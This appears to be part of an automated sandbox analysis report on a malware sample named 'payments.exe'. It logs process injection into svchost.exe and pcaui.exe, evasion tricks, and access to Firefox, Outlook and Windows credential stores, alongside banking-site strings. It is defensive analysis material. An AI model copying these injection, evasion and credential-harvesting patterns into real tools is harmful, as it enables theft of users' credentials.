                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CCB134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00CCB134
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDE1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00CDE1FD
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD6532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,0_2_00CD6532
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CEC18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,0_2_00CEC18C
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00C9406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00C9406B
                Source: C:\Users\user\Desktop\payments.exeFile created: C:\Users\user\AppData\Local\Temp\aut32B9.tmpJump to behavior
                Source: C:\Users\user\Desktop\payments.exeCommand line argument: `>0_2_00C93A0F
                Source: C:\Users\user\Desktop\payments.exeCommand line argument: `>0_2_00C93A0F
                Source: payments.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Program Files\Mozilla Firefox\firefox.exeFile read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                Source: C:\Users\user\Desktop\payments.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: pcaui.exe, 00000004.00000003.1652156354.0000000002923000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.0000000002944000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1654649705.0000000002951000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.0000000002974000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1652156354.0000000002944000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
                Source: unknownProcess created: C:\Users\user\Desktop\payments.exe "C:\Users\user\Desktop\payments.exe"
                Source: C:\Users\user\Desktop\payments.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\payments.exe"
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"
                Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                Source: C:\Users\user\Desktop\payments.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\payments.exe"Jump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeProcess created: C:\Windows\SysWOW64\pcaui.exe "C:\Windows\SysWOW64\pcaui.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: wsock32.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: version.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: mpr.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\payments.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: pcaui.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dui70.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wer.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: ieframe.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netapi32.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: version.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: userenv.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wkscli.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: secur32.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: mlang.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: winsqlite3.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: vaultcli.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: wintypes.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: dpapi.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeSection loaded: cryptbase.dllJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
                Source: Window RecorderWindow detected: More than 3 window changes detected
                Source: C:\Windows\SysWOW64\pcaui.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
                Source: payments.exeStatic file information: File size 1213440 > 1048576
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                Source: payments.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                Source: Binary string: pcaui.pdb source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: XhwUfLdILQipZF.exe, 00000003.00000000.1375164314.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp, XhwUfLdILQipZF.exe, 00000006.00000000.1536552318.0000000000D0E000.00000002.00000001.01000000.00000004.sdmp
                Source: Binary string: wntdll.pdbUGP source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: payments.exe, 00000000.00000003.1357793161.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, payments.exe, 00000000.00000003.1357005874.0000000003870000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000002.00000002.1455944553.0000000003700000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1455944553.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1358223531.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1360100767.0000000003500000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, pcaui.exe, 00000004.00000002.3801220213.00000000045C0000.00000040.00001000.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1470322862.000000000440E000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000003.1468233780.0000000004259000.00000004.00000020.00020000.00000000.sdmp, pcaui.exe, 00000004.00000002.3801220213.000000000475E000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: svchost.pdb source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: svchost.pdbUGP source: pcaui.exe, 00000004.00000002.3802641063.0000000004BEC000.00000004.10000000.00040000.00000000.sdmp, pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3800870826.00000000031EC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.1761090019.000000002FC0C000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: pcaui.pdbGCTL source: svchost.exe, 00000002.00000003.1424379839.000000000304D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1424379839.000000000302B000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000003.00000003.1888424648.00000000011DB000.00000004.00000001.00020000.00000000.sdmp
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: payments.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAE01E LoadLibraryA,GetProcAddress,0_2_00CAE01E
                Source: payments.exeStatic PE information: real checksum: 0x12d8bd should be: 0x1309ee
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB6B05 push ecx; ret 0_2_00CB6B18
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB0C5B push es; retf 0_2_00CB0C65
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB0C6E push es; retf 0_2_00CB0C75
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_010AEE57 push ebp; retf 0_2_010AEE75
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004030C0 push eax; ret 2_2_004030C2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040D0E4 push edx; retf 2_2_0040D0E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040808C push esp; ret 2_2_00408097
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417257 push 00000020h; iretd 2_2_00417259
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417260 pushad ; retf 2_2_0041726B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00417A64 push ecx; ret 2_2_00417A78
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EA38 push eax; retf 2_2_0041EA4B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004172D4 pushad ; retf 2_2_0041726B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0041EA8D push esp; retf 2_2_0041EA8E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416797 push ds; iretd 2_2_004167A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370225F pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037027FA pushad ; ret 2_2_037027F9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037309AD push ecx; mov dword ptr [esp], ecx2_2_037309B6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370283D push eax; iretd 2_2_03702858
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0397AB05 push esp; ret 3_2_0397AB10
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0397FB5D push edx; retf 3_2_0397FB5E
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989210 push ds; iretd 3_2_0398921B
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03988E38 pushad ; iretd 3_2_03988E3E
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03991506 push esp; retf 3_2_03991507
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989D4D pushad ; retf 3_2_03989CE4
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_039914B1 push eax; retf 3_2_039914C4
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989CD9 pushad ; retf 3_2_03989CE4
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_0398A4DD push ecx; ret 3_2_0398A4F1
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exeCode function: 3_2_03989CD0 push 00000020h; iretd 3_2_03989CD2
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C27FA pushad ; ret 4_2_045C27F9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C225F pushad ; ret 4_2_045C27F9
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_045C283D push eax; iretd 4_2_045C2858
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CF8111 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_00CF8111
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CAEB42 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00CAEB42
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CB123A __initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00CB123A
                Source: C:\Users\user\Desktop\payments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\payments.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

                Malware Analysis System Evasion

                barindex
                Switches to a custom stack to bypass stack traces
                Source: C:\Users\user\Desktop\payments.exeAPI/Special instruction interceptor: Address: 10ADF74
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818D324
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818D7E4
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818D944
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818D504
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818D544
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818D1E4
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF908190154
                Source: C:\Windows\SysWOW64\pcaui.exeAPI/Special instruction interceptor: Address: 7FF90818DA44
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0377096E rdtsc 2_2_0377096E
                Source: C:\Windows\SysWOW64\pcaui.exeWindow / User API: threadDelayed 2815Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeWindow / User API: threadDelayed 7159Jump to behavior
                Source: C:\Users\user\Desktop\payments.exeEvaded block: after key decisiongraph_0-94983
                Source: C:\Users\user\Desktop\payments.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-95760
                Source: C:\Users\user\Desktop\payments.exeAPI coverage: 4.8 %
                Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
                Source: C:\Windows\SysWOW64\pcaui.exeAPI coverage: 2.6 %
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656Thread sleep count: 2815 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656Thread sleep time: -5630000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656Thread sleep count: 7159 > 30Jump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exe TID: 7656Thread sleep time: -14318000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe TID: 7804Thread sleep time: -75000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe TID: 7804Thread sleep time: -57000s >= -30000sJump to behavior
                Source: C:\Program Files (x86)\vStUfGvKGwoXegmVEyxLwjOSQAnKWmLuLzHsczaMjNPFreMZJuPixoX\XhwUfLdILQipZF.exe TID: 7804Thread sleep time: -39000s >= -30000sJump to behavior
                Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                Source: C:\Windows\SysWOW64\pcaui.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD6CA9 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00CD6CA9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,0_2_00CD60DD
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CD63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,0_2_00CD63F9
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CDEB60
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_00CDF5FA
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CDF56F FindFirstFileW,FindClose,0_2_00CDF56F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CE1B2F
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_00CE1C8A
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CE1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_00CE1F94
                Source: C:\Windows\SysWOW64\pcaui.exeCode function: 4_2_026BC920 FindFirstFileW,FindNextFileW,FindClose,4_2_026BC920
                Source: C:\Users\user\Desktop\payments.exeCode function: 0_2_00CADDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00CADDC0
                Source: 72Z53078.4.drBinary or memory string: dev.azure.comVMware20,11696497155j
                Source: 72Z53078.4.drBinary or memory string: global block list test formVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: turbotax.intuit.comVMware20,11696497155t
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - COM.HKVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - HKVMware20,11696497155]
                Source: 72Z53078.4.drBinary or memory string: secure.bankofamerica.comVMware20,11696497155|UE
                Source: 72Z53078.4.drBinary or memory string: tasks.office.comVMware20,11696497155o
                Source: 72Z53078.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696497155
                Source: pcaui.exe, 00000004.00000002.3794437127.00000000028CC000.00000004.00000020.00020000.00000000.sdmp, XhwUfLdILQipZF.exe, 00000006.00000002.3795525276.00000000011A9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000008.00000002.1762497611.0000022F2FBEC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: 72Z53078.4.drBinary or memory string: bankofamerica.comVMware20,11696497155x
                Source: 72Z53078.4.drBinary or memory string: ms.portal.azure.comVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: trackpan.utiitsl.comVMware20,11696497155h
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696497155p
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - EU WestVMware20,11696497155n
                Source: 72Z53078.4.drBinary or memory string: interactivebrokers.co.inVMware20,11696497155d
                Source: 72Z53078.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155x
                Source: 72Z53078.4.drBinary or memory string: Test URL for global passwords blocklistVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: interactivebrokers.comVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: AMC password management pageVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: Canara Transaction PasswordVMware20,11696497155}
                Source: 72Z53078.4.drBinary or memory string: Canara Change Transaction PasswordVMware20,11696497155^
                Source: 72Z53078.4.drBinary or memory string: account.microsoft.com/profileVMware20,11696497155u
                Source: 72Z53078.4.drBinary or memory string: discord.comVMware20,11696497155f
                Source: 72Z53078.4.drBinary or memory string: netportal.hdfcbank.comVMware20,11696497155
                Source: 72Z53078.4.drBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696497155z
                Source: 72Z53078.4.drBinary or memory string: outlook.office365.comVMware20,11696497155t
                Source: 72Z53078.4.drBinary or memory string: outlook.office.comVMware20,11696497155s
